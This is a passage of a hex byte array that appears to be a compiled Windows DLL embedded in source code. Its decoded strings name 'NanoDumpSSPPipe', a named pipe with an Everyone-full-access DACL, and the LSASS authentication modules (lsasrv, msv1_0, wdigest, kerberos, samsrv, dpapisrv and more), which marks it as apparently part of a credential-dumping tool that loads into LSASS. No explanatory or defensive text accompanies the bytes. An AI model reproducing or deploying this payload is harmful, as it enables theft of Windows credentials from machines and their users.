x0A,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0xFA,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xEA,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xDA,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xCA,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xBA,0x90,0x00,0x00,0x90,0x90,0xE9,0x9B,0x92,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xD0,0x80,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x81,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0x7D,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x7F,0x8A,0xD9,0x02,0x00,0x00,0x00,0x40,0x7E,0x8A,0xD9,0x02,0x00,0x00,0x00,0x20,0x7E,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5C,0x00,0x3F,0x00,0x3F,0x00,0x5C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6D,0x00,0x73,0x00,0x76,0x00,0x31,0x00,0x5F,0x00,0x30,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x73,0x00,0x70,0x00,0x6B,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x64,0x00,0x69,0x00,0x67,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x65,0x00,0x72,0x00,0x62,0x00,0x65,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x64,0x00,0x70,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x64,0x00,0x63,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x64,0x00,0x62,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x73,0x00,0x61,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x72,0x00,0x73,0x00,0x61,0x00,0x65,0x00,0x6E,0x00,0x68,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x70,0x00,0x72,0x00,0x6F,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x65,0x00,0x76,0x00,0x65,0x00,0x6E,0x00,0x74,0x00,0x6C,0x00,0x6F,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x65,0x00,0x76,0x00,0x74,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x65,0x00,0x72,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x6C,0x00,0x6F,0x00,0x75,0x00,0x64,0x00,0x61,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x44,0x00,0x3A,0x00,0x28,0x00,0x41,0x00,0x3B,0x00,0x4F,0x00,0x49,0x00,0x43,0x00,0x49,0x00,0x3B,0x00,0x47,0x00,0x41,0x00,0x3B,0x00,0x3B,0x00,0x3B,0x00,0x57,0x00,0x44,0x00,0x29,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00,0x2E,0x00,0x5C,0x00,0x70,0x00,0x69,0x00,0x70,0x00,0x65,0x00,0x5C,0x00,0x25,0x00,0x77,0x00,0x73,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4E,0x00,0x61,0x00,0x6E,0x00,0x6F,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x53,0x00,0x53,0x00,0x50,0x00,0x50,0x00,0x69,0x00,0x70,0x00,0x65,0x00,0x00,0x00,0xE0,0x70,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x8B,0xD9,0x02,0x00,0x00,0x00,0x08,0x30,0x8B,0xD9,0x02,0x00,0x00,0x00,0xCC,0xF2,0x8A,0xD9,0x02,0x00,0x00,0x00,0x30,0x20,0x8B,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4D,0x69,0x6E,0x67,0x77,0x2D,0x77,0x36,0x34,0x20,0x72,0x75,0x6E,0x74,0x69,0x6D,0x65,0x20,0x66,0x61,0x69,0x6C,0x75,0x72,0x65,0x3A,0x0A,0x00,0x00,0x00,0x00,0x00,0x41,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x20,0x68,0x61,0x73,0x20,0x6E,0x6F,0x20,0x69,0x6D,0x61,0x67,0x65,0x2D,0x73,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x66,0x6F,0x72,0x20,0x25,0x64,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74,0x20,0x61,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x77,0x69,0x74,0x68,0x20,0x63,0x6F,0x64,0x65,0x20,0x30,0x78,0x25,0x78,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x70,0x72,0x6F,0x74,0x6F,0x63,0x6F,0x6C,0x20,0x76,0x65,0x72,0x73,0x69,0x6F,0x6E,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x62,0x69,0x74,0x20,0x73,0x69,0x7A,0x65,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x25,0x64,0x20,0x62,0x69,0x74,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x61,0x74,0x20,0x25,0x70,0x20,0x6F,0x75,0x74,0x20,0x6F,0x66,0x20,0x72,0x61,0x6E,0x67,0x65,0x2C,0x20,0x74,0x61,0x72,0x67,0x65,0x74,0x69,0x6E,0x67,0x20,0x25,0x70,0x2C,0x20,0x79,0x69,0x65,0x6C,0x64,0x69,0x6E,0x67,0x20,0x74,0x68,0x65,0x20,0x76,0x61,0x6C,0x75,0x65,0x20,0x25,0x70,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x90,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x80,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0xA8,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0xA8,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0xA2,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xD0,0xF2,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x24,0x90,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0xF2,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0xF2,0x8A,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x8B,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x20,0x8B,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x20,0x8B,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x20,0x8B,0xD9,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x0C,0x10,0x00,0x00,0x00,0xC0,0x00,0x00,0x10,0x10,0x00,0x00,0xDF,0x11,0x00,0x00,0x04,0xC0,0x00,0x00,0xE0,0x11,0x00,0x00,0x3C,0x13,0x00,0x00,0x1C,0xC0,0x00,0x00,0x40,0x13,0x00,0x00,0x52,0x13,0x00,0x00,0x30,0xC0,0x00,0x00,0x60,0x13,0x00,0x00,0x6F,0x13,0x00,0x00,0x34,0xC0,0x00,0x00,0x70,0x13,0x00,0x00,0x7C,0x13,0x00,0x00,0x38,0xC0,0x00,0x00,0x80,0x13,0x00,0x00,0x81,0x13,0x00,0x00,0x3C,0xC0,0x00,0x00,0x90,0x13,0x00,0x00,0xB2,0x13,0x00,0x00,0x40,0xC0,0x00,0x00,0xB2,0x13,0x00,0x00,0x2C,0x17,0x00,0x00,0x4C,0xC0,0x00,0x00,0x2C,0x17,0x00,0x00,0xC5,0x17,0x00,0x00,0x5C,0xC0,0x00,0x00,0xC5,0x17,0x00,0x00,0xCA,0x18,0x00,0x00,0x68,0xC0,0x00,0x00,0xCA,0x18,0x00,0x00,0x09,0x19,0x00,0x00,0x74,0xC0,0x00,0x00,0x09,0x19,0x00,0x00,0x71,0x1A,0x00,0x00,0x80,0xC0,0x00,0x00,0x71,0x1A,0x00,0x00,0x73,0x1B,0x00,0x00,0x8C,0xC0,0x00,0x00,0x73,0x1B,0x00,0x00,0x68,0x1C,0x00,0x00,0x98,0xC0,0x00,0x00,0x68,0x1C,0x00,0x00,0x17,0x1E,0x00,0x00,0xA8,0xC0,0x00,0x00,0x17,0x1E,0x00,0x00,0xB2,0x1F,0x00,0x00,0xB8,0xC0,0x00,0x00,0xB2,0x1F,0x00,0x00,0x19,0x20,0x00,0x00,0xC8,0xC0